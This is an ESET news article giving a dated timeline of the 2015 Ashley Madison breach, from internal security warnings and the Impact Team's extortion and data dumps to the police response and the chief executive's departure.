Security of Ashley Madison breached sooner than you think

It is one of the biggest data breaches in recent times and one of the most far-reaching, the full implications of which are yet to be understood. In fact, as the story continues to unfold, the Ashley Madison attack could become one of the most notable instances of cybercrime in 2015.

Here is a timeline of key events documenting the severity and seriousness of this event, which is now subject to a major, ongoing, multi-partner investigation.

(Month unknown) 2012

In an internal email, Ashley Madison’s founding chief technology officer, Raja Bhatia, warned his colleagues that Ashley Madison and its parent company Avid Life Media (ALM) were at risk of being attacked (clearly not taking onboard best practice).

He reportedly said that “security was an obvious afterthought”, adding that he himself had failed to give security the attention it evidently warranted. He continued:

“There will be an eventual security crisis amongst one of your [ALM’s] properties and the media will leap on it as they always do.

“What separates the companies that get skinned alive from those that quickly recover is how you handle the communication both publicly and even more importantly, to your users. Silence is the worst possible answer.”

November 2012

Emails leaked by the Impact Team following its major online data dump of member details in 2015 revealed that Mr Bhatia had discussed the idea of “hacking” into another website with Ashley Madison’s chief executive, Noel Biderman.

Mr Bhatia reportedly sent Mr Biderman an email explaining that he had identified a vulnerability on Nerve, an online magazine that specializes in discussing sex, relationships and culture.

When asked what the “security hole” meant and how he had found it, Mr Bhatia replied: “Was researching the casual dating space as it’s been on my mind. I remembered Nerve relaunched with a slick site and did a little digging into how it worked.

“They did a poor job of auditing their site. Have access to all their user records, including emails, encrypted password, if they purchased or not, who they talked to, what their search preferences are, last login [and] fraud risk profile.”

Interestingly, ALM had, prior to this exchange, been approached by Nerve to discuss the possibility of a partnership or investment opportunity.

In response to these revelations, ALM said in a statement to Motherboard that the communication between Mr Bhatia and Mr Biderman had been taken out of context.

It stated: “Noel contacted Raja Bhatia and asked for his assistance in conducting technical due diligence on the opportunity [of a partnership]. This activity, while clumsily conducted, uncovered certain technology shortcomings which Noel attempted to understand and confirm. At no point was there an effort made to hack, steal or use’s proprietary data.”

2013 – 2014

As far as can be ascertained, there were no reports of data breaches at Ashley Madison, nor were any concerns aired with regards to security vulnerabilities at the website during this time. However, there may well have been internal discussions or discoveries that have not been made public.

25th May, 2015

Again, the first half of 2015 seemed to be business as usual, with no indication of what was to come Yet, in May, Ashley Madison’s director of security, Mark Steele, contacted Mr Biderman to discuss matters of security, which seemed to have been high on the agenda.

He explained: “Given our open registration policy and recent high profile exploits, every security consultant and their extended family will be trying to trump up business.

“Our codebase has many [riddled] XSS/CRSF vulnerabilities which are relatively easy to find [for a security researcher], and somewhat difficult to exploit in the wild [requires phishing]. Other vulnerabilities would be things like SQL injection/data leaks, which would be much more damaging.”

12th July

ALM’s employees turned up to work, ready to start what they thought was another normal day. However, after logging into their respective computers, they were greeted with a disconcerting message from the Impact Team.

To the music of AC/DC – their hit Thunderstruck – the message read: “We are the Impact Team. We have taken over all systems in your entire office and production domains, all customer information databases, source code repositories, financial records [and] emails.

“Shutting down AM [Ashley Madison] and EM [Established Men] will cost you, but non-compliance will cost you more: We will release all customer records, profiles … and matching credit card details … Avid Life Media will be liable for fraud and extreme harm to millions of users.”

19th July

Five days on from “first contact”, the Impact Team posted the exact same message on Pastebin, a website that allows you to store and share basic text for a limited period of time.

In this version, however, redacted details of two Ashley Madison members are revealed – a demonstration that the group is serious about its threat to go fully public with the data it has stolen.

The attackers then informed security journalist Brian of the breach, who then broke the news to the rest of the world. He revealed that up to 37 million members of the site could be at risk of being exposed in a month’s time if the Impact Team’s demands were not met.

Before making an official statement the following day, Mr Biderman informed Mr Krebs that the company was “working diligently and feverishly” to take down ALM’s intellectual property.

20th July

ALM announced that it has be subject to an “an attempt by an unauthorized party to gain access to its systems”. It said that since making the discovery, it has been able to secure its website from any other further, possible attacks.

It added: “We are working with law enforcement agencies, which are investigating this criminal act. Any and all parties responsible for this act of cyberterrorism will be held responsible.”

Responding to news that its paid delete service doesn’t remove all personal information as claimed, Ashley Madison stated that this was false. It reassured its users that a “hard-delete”, as it puts it, clears everything.

Based on the unique circumstances of the case, it informed its members that the service is free “as customers’ privacy is of the utmost concern”. However, one journalist documents her difficulty in doing this.

22nd July

As details of the breach unfold and the story evolves into one of the most topical and widely discussed and debated cybercrimes in recent years, the Impact Team release the personal details of two men who had signed up to the service.

The information includes their names, their addresses and their sexual interests. This is considered to be to be first “official” data leak and is seen as a strong sign of intent from the attackers.

18th August

One month on from the attack, it is evident that ALM is not going to bow to pressure from the Impact Team. In response to this, the group, true to their word, released the information on the dark web.

It states: “Time’s up! Avid Life Media have failed to take down Ashley Madison and Established Men. We have explained the fraud, deceit and stupidity of ALM and their members. Now everyone gets to see their data.

“Find yourself in here? It was ALM that failed you and lied to you. Prosecute them and claim damages. Then move on with your life. Learn your lesson and make your amends. Embarrassing now but you’ll get over it.”

The same day, the company released a statement reaffirming its commitment to countering the efforts of the Impact Team while continuing to run the Ashley Madison website. It stated that multiple law enforcement investigations were underway, suggesting that the matter is being dealt with in the most comprehensive way possible.

“This event is not an act of hacktivism, it is an act of criminality It is an illegal action against the individual members of, as well as any freethinking people who choose to engage in fully lawful online activities,” it went on to say.

“The criminal, or criminals, involved in this act have appointed themselves as the moral judge, juror, and executioner, seeing fit to impose a personal notion of virtue on all of society. We will not sit idly by and allow these thieves to force their personal ideology on citizens around the world.”

20th August

Two days later, while everyone is still coming to terms with the implications of this data dump, the Impact Team released its second trove of data onto the web. This is larger than the original release – approximately 20 gigabytes compared to 10 gigabytes – and contains internal documents belonging to ALM, including emails belonging to Mr Biderman.

Addressing ALM’s chief executive directly, the Impact Team remarked: “Hey Noel, you can admit it’s real now.” This is seen as a retort to the fact that Mr Biderman had questioned the full validity of the first data dump.

21st August

In an exclusive interview with Motherboard – which was posted online not long after a third release of data – the Impact Team said that while they had “worked hard” to make the attack undetectable, once they were in, they “found nothing to bypass”.

The group claimed that security was “bad” and that “nobody was watching”. It added: “Only thing was segmented network. You could use Pass1234 from the internet to VPN to root on all servers.”

So sophisticated was their breach, the group allege that they have amassed over 300 gigabytes of internal documents and emails, collected over a number of years (which they stated in their original message to ALM employees).

They also suggest that the Ashley Madison attack is just the beginning: “Any companies that make hundreds of millions profiting off pain of others, secrets, and lies. Maybe corrupt politicians. If we do, it will be a long time, but it will be total.”

24th August

It becomes clear that members may fall victim to extortion, with cybercriminals looking to exploit the Ashley Madison data breach for financial gain. Stephen Cobb, a senior security researcher at ESET, says that the risks faced by members are all too real:

“This illegal data dump represents a bonanza for scam artists of every stripe, from every corner of the world; we are going to see everything from phishing emails to blackmail attempts, against a range of different parties, not just people who signed up at the site.”

At a Toronto Police news conference, led by superintendent Bryce Evans, the media and the public are recounted the events of the past month and updated on the current situation.

Mr Evans said: “The ripple effect of the Impact Team’s actions has and will continue to have a long-term social and economic impact and they have already sparked spin-offs of crimes and further victimization. As of this morning we have two unconfirmed reports of suicides that are associated because of the leak of Ashley Madison’s customer’s profiles.”

The website is offering $500,000 Canadian dollars (US $375,000) to anyone that provides the taskforce that has been set up to deal with the case with information that leads to the “identification, arrest and conviction of the person or persons responsible for the theft of proprietary data”.

26th August

A potential breakthrough is made, with Mr Krebs detailing his own investigation into the perpetrators behind the Ashley Madison data breach. The security expert explains that his analysis of a “prolific Twitter user”, who goes by the name Thadeus Zu, suggests a link to the attack.

And, if not, Mr Krebs went on to say, “one thing is clear: If Zu wasn’t involved in the hack, he almost certainly knows who was.”

28th August

ALM announces that Mr Biderman, founder and chief executive of Ashley Madison, has stepped down and “is no longer with the company”. An official statement explains that this is in the “best interest” of all, adding that in the interim, the business will be led by the existing senior management team.

This article was updated on 28th August, 2015.

Author , ESET

Follow us

Copyright © 2016 ESET, All Rights Reserved.